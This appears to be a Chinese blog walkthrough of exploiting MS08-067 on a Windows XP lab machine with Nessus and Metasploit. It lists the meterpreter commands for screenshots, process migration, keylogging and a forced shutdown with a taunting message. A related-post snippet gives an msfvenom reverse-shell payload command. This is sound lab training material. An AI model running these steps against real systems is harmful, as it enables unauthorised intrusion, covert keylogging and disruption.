linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP

最新推荐文章于 2023-04-15 18:20:36 发布
最新推荐文章于 2023-04-15 18:20:36 发布
阅读量373 收藏
点赞数
文章标签: linux渗透利用漏洞ms08_067

一、Nessus扫描漏洞​

a4c26d1e5885305701be709a3d33442f.png

二、metasploit渗透

启动metasploit,输入命令msfconsole​​

a4c26d1e5885305701be709a3d33442f.png

使用search 命令搜索未打补丁编号,search ms08-067 ​

a4c26d1e5885305701be709a3d33442f.png

使用由nessus确定的攻击程序,use

攻击程序。再查看配置的信息​

a4c26d1e5885305701be709a3d33442f.png

设置接收主机IP和发送主机IP地址,再查看配置信息,确定​

set RHOST 靶机IP​

set LHOST 发起攻击主机IP​​

show options​

a4c26d1e5885305701be709a3d33442f.png

开始渗透攻击,exploit​

a4c26d1e5885305701be709a3d33442f.png

成功进入meterpreter shell,输入screenshot可捕捉靶机桌面

a4c26d1e5885305701be709a3d33442f.png

查看捕捉到的靶机图片,输入命令后,即可打开捕捉到的图片​

a4c26d1e5885305701be709a3d33442f.png

查看meterpreter的id号,getpid。查看explorer.exe的ID号。

a4c26d1e5885305701be709a3d33442f.png

接下来需要隐藏id到explorer.exe中。migrate

1400,再查看当前meterpreter的id是否隐藏好

a4c26d1e5885305701be709a3d33442f.png

启动键盘记录keyscan_start,转储从靶机获取的键盘记录keyscan_dump,终止键盘记录keyscan_stop。

a4c26d1e5885305701be709a3d33442f.png

查看靶机正在运行的用户

a4c26d1e5885305701be709a3d33442f.png

进入shell,这里面做个测试在C盘根目录创建一个文件夹为test_file

a4c26d1e5885305701be709a3d33442f.png

在靶机系统中可以看见test_file文件夹

a4c26d1e5885305701be709a3d33442f.png

在20秒后关闭对方系统,并显示信息your computer has been hacked

a4c26d1e5885305701be709a3d33442f.png

靶机被关闭,且有消息提示

a4c26d1e5885305701be709a3d33442f.png

处黑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS08067,MS10061漏洞靶机环境搭建.docx
07-07
MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下
使用MS08-067 漏洞攻击xp靶机
weixin_30877227的博客
07-11 541
一、攻击前的准备 Linux 虚拟机 用于运行大名鼎鼎的msf xp sp3 中文版 (或者其他版本) 二、准备攻击 在msfconsole 中搜索漏洞编号 查看该漏洞支持的平台 Available targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000...
渗透测试基础-1 针对MS08-067漏洞
zhangyixing_mj的博客
05-07 425
一、准备工作 工具环境:kali下载安装 靶场环境: 1.kali切换到root权限。有两种方式:直接切换到管理员权限,这种方式虽然比较方便,但是也比较危险,root权限很大,如果有误操作会产生较大的影响;当某些操作需要管理员权限时,临时提权,该操作结束后,恢复普通用户权限。推荐第二种方 sudo su #切换到管理员权限下 sudo ifconfig #临时对ifconfig操作提权 2.将kali和靶场winXP设置到同一局域网下,将二者的网络适配器均设置为 仅主机模式。 操作:选中.
metasploit利用漏洞渗透攻击靶机
weixin_30876945的博客
11-05 721
1、网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机。这两台计算机处于同一个网段中,可以相互通讯,Kali系统用作攻击机,下面将在此系统上运行Metasploit进行渗透测试,而Windows 2000是本次任务中需要进行渗透入侵的靶机,保持安装后的默认状态,没...
渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机(官方原版镜像)
05-08
本人学习时使用的的这两个系统,常见的高风险漏洞较多,容易利用,适合新手练习。 metasploitable-linux为常用的Linux靶机,系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更简单一些,适合新手练习。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装...方式可以直接打靶机,可以上传到跳板机执行。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
linux渗透利用漏洞ms08_067,MS08_067漏洞渗透攻击
weixin_35853254的博客
05-18 78
【USACO 3.1】Stamps (完全背包)题意:给你n种价值不同的邮票,最大的不超过10000元,一次最多贴k张,求1到多少都能被表示出来?n≤50,k≤200. 题解:dp[i]表示i元最少可以用几张邮票表示,那么对于价值a的邮票,可以推出 ...2013成都Regional:一块木板,几个气球先来看木板: 再来看气球: 最后看木板+气球: google送的纪念品.....
MS08-067 漏洞复现报告
Williamanddog的博客
08-29 2385
如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验 证即可利用漏洞运行任意代码。漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。.
MS08_067_netapi漏洞复现
weixin_45418565的博客
05-02 858
MS08_067_netapi漏洞复现 winxp的ip地址为192.168.0.101 kali的ip地址为192.168.0.105 确保两台主机能ping通 接着我们使用kali中自带的msf进行攻击 开启postgresql数据库 service postgresql start 启动msf msfconsole 我们利用msf的数据库搜索相应winxp漏洞 search...
从入门到入土:Nessus出击:使用nessus扫描某台靶机
Q_U_A_R_T_E_R的博客
09-07 1614
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益。不合适引用,自当删除! 若被用于非法行为,与我本人无关 使用nessus扫描某台靶机实验环境Nessus安装操作靶机启动Nessus完成 实验环境 kali虚拟机 windows windowsXP vm Nessus安装 传送门 操作 靶机 选择vm下的winXP虚拟机作为靶机进行扫描 查看一下IP 192.168.231
使用Meterperter会话获取目标屏幕与键盘记录
sGanYu
09-09 2240
使用MS08-067漏洞开启·Meterpreter会话 截图目标主机 使用screenshot命令获取目标截图,这里是被默认保存至/root/桌面/ijROqnkE.jpeg 使用sysinfo即可获取系统运行的平台 获取目标主机键盘记录 先使用ps命令查看运行在目标系统的进程,获得system、cmd.exe、explorer.exe等在内的数十个进程 输入migrate命令将meterpreter会话迁移至explorer.exe(1384)进程中 ...
Linux操作系统渗透
最新发布
JJH2724719395的博客
04-15 569
linux操作系统渗透
Escalate_Linux靶机提权渗透测试
末班车的博客
03-10 691
使用Escalate_Linux靶机,学习多种提权方法
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
qq_50854662的博客
05-16 5886
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利
利用ms08_067对XP进行渗透
xiaopangding09的博客
06-01 594
简单记录以下之前写过的一次作业,权当复习一下。 1.什么是ms08_067? MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用漏洞的蠕虫病毒。 说明:微软安全公告KB958644 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 发布日期:2008/10/22 下载大小:因操作系统而异。 受影响的操作系统: Windows 2000;XP;Ser
渗透测试实战:案例一—发现与修复SMB服务漏洞
在"渗透测试学习笔记之案例一.pdf"中,作者分享了其学习渗透测试过程中的一个实际案例。首先,他强调由于工作繁忙而暂停了博客更新,但为了保持技能的熟练度,他决定开始记录与渗透测试相关的学习笔记。这个系列将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值